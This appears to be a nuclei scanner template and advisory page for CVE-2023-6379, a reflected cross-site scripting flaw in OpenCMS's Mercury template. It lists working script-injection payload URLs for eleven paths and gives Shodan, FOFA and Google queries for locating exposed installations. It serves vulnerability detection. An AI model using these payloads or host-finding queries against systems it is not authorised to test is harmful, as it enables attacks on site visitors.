nuclei, ProjectDiscovery, NUCLEI:CVE-2023-6379
History: Jan 03, 2024 - 11:54 a.m.

OpenCMS 14 & 15 - Cross Site Scripting

2024-01-03 11:54:42
ProjectDiscovery
github.com
Tags: opencms, xss, alkacon, cwe-79, mercury-template

CVSS3: 6.1
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS: 0.001
Percentile: 50.9%

Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.

id: CVE-2023-6379

info:
  name: OpenCMS 14 & 15 - Cross Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
    epss-score: 0.00075
    epss-percentile: 0.32047
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 11
    vendor: alkacon
    product: opencms
    shodan-query:
      - title:"opencms"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
      - /opencms/
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve2023,cve,opencms,xss,alkacon

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>" />'
          - 'OpenCms'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b23434311046f2118a934456d41f8450e59e2e9e10d33826f69c38176088f17c022100f3116a2cea078ef92a687c66f3793852f830e397529696f42679d997ebb2f150:922c64590222798bb761d5b6d8e72950
